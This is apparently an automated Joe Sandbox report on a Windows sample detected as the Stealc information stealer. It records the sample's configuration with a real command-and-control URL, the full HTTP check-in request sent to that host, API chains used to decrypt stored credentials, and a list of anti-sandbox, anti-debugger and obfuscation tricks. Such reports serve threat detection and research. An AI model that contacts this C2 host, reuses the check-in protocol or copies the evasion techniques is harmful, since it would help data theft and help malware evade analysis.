Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1522245
MD5:c4989e7909961b15e2428e4bdc416bf1
SHA1:6a36b4ad1ca0fce053b450cf21fe848a168870e6
SHA256:36453fb6acaf0514d0af6fbf8ed6b8da0372c90b713c18ef73d63b97f2ec5f53
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C4989E7909961B15E2428E4BDC416BF1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2075603665.0000000005050000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6984JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6984JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.690000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-29T15:17:05.403571+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.690000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0069C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00697240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00699AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00699B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_006A8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006A38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006A4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0069DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0069E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006A4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0069ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0069BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0069DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006A3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0069F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069F68A FindFirstFileA,0_2_0069F68A

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 37 41 30 37 38 36 32 46 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="hwid"927A07862F713604296297------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="build"save------IJDHDGDAAAAKFIDGHJDG--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00694880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 37 41 30 37 38 36 32 46 37 31 33 36 30 34 32 39 36 32 39 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="hwid"927A07862F713604296297------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="build"save------IJDHDGDAAAAKFIDGHJDG--
                Source: file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2117942451.00000000012A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2117942451.00000000012A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/;
                Source: file.exe, 00000000.00000002.2117942451.00000000012A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2117942451.00000000012C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php8
                Source: file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37I

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C70_2_00A5E8C7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A548790_2_00A54879
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009AD86F0_2_009AD86F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A59A600_2_00A59A60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E6A560_2_009E6A56
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A623260_2_00A62326
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091B3190_2_0091B319
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A653100_2_00A65310
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A63C980_2_00A63C98
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B05DC60_2_00B05DC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5BD040_2_00A5BD04
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0E5070_2_00A0E507
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0095D66F0_2_0095D66F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5CF420_2_00A5CF42
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 006945C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: gnrpyfds ZLIB complexity 0.9948069223600122
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_006A9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_006A3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\K1QH1J2S.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1839104 > 1048576
                Source: file.exeStatic PE information: Raw size of gnrpyfds is bigger than: 0x100000 < 0x19ac00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.690000.0.unpack :EW;.rsrc :W;.idata :W; :EW;gnrpyfds:EW;orxvkivb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;gnrpyfds:EW;orxvkivb:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006A9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ca7eb should be: 0x1c5200
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: gnrpyfds
                Source: file.exeStatic PE information: section name: orxvkivb
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A8A0B8 push 1B404B91h; mov dword ptr [esp], eax0_2_00A8A313
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1E892 push edi; mov dword ptr [esp], 214A15E9h0_2_00B1E896
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1E892 push 6C22C5C1h; mov dword ptr [esp], ecx0_2_00B1E8E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1E892 push 62733600h; mov dword ptr [esp], eax0_2_00B1E8F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B1E892 push 6E9FD5F6h; mov dword ptr [esp], edx0_2_00B1E94C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009470A0 push 05B842BAh; mov dword ptr [esp], edi0_2_00947151
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009470A0 push edx; mov dword ptr [esp], ebp0_2_00947155
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009470A0 push ebx; mov dword ptr [esp], 63BF1812h0_2_00947159
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF809B push ebp; mov dword ptr [esp], eax0_2_00AF80B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B008F8 push eax; mov dword ptr [esp], ecx0_2_00B0091E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B008F8 push ecx; mov dword ptr [esp], ebp0_2_00B009DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AB035 push ecx; ret 0_2_006AB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 6D896095h; mov dword ptr [esp], eax0_2_00A5E93A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push ecx; mov dword ptr [esp], 5FBE747Fh0_2_00A5E992
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push ecx; mov dword ptr [esp], edx0_2_00A5E9D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 2DDC522Fh; mov dword ptr [esp], ebp0_2_00A5E9EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 1F4B9047h; mov dword ptr [esp], ebp0_2_00A5E9F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push ebx; mov dword ptr [esp], 777F3B0Bh0_2_00A5E9FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 0F366B30h; mov dword ptr [esp], edx0_2_00A5EA59
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 36C3BC80h; mov dword ptr [esp], edi0_2_00A5EA8D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push ebx; mov dword ptr [esp], 5D3A4AE8h0_2_00A5EADA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 6E92D4F6h; mov dword ptr [esp], ecx0_2_00A5EAEA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 3193DACDh; mov dword ptr [esp], esi0_2_00A5EB85
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 29F7C774h; mov dword ptr [esp], ecx0_2_00A5EB95
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 53DF5748h; mov dword ptr [esp], esi0_2_00A5EB9F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push edi; mov dword ptr [esp], 00000088h0_2_00A5ECC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 01740C13h; mov dword ptr [esp], eax0_2_00A5ECDB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push esi; mov dword ptr [esp], 3A6ADE50h0_2_00A5ECE2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 16FF356Dh; mov dword ptr [esp], esp0_2_00A5ED6A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push edi; mov dword ptr [esp], edx0_2_00A5ED8F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5E8C7 push 007B46D2h; mov dword ptr [esp], ebp0_2_00A5ED97
                Source: file.exeStatic PE information: section name: gnrpyfds entropy: 7.953723729400017

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006A9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13602
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6685D second address: A66861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A66861 second address: A6686B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6686B second address: A6686F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6686F second address: A66873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D5D7 second address: A6D5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDF30F40A5Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D5EC second address: A6D5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D5F0 second address: A6D620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30F40A63h 0x00000007 jmp 00007FDF30F40A69h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6D7B3 second address: A6D7B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6DCCD second address: A6DCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jl 00007FDF30F40A56h 0x0000000c jmp 00007FDF30F40A63h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6DCF1 second address: A6DCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70CB5 second address: A70CE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jbe 00007FDF30F40A56h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FDF30F40A66h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70CE0 second address: A70CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
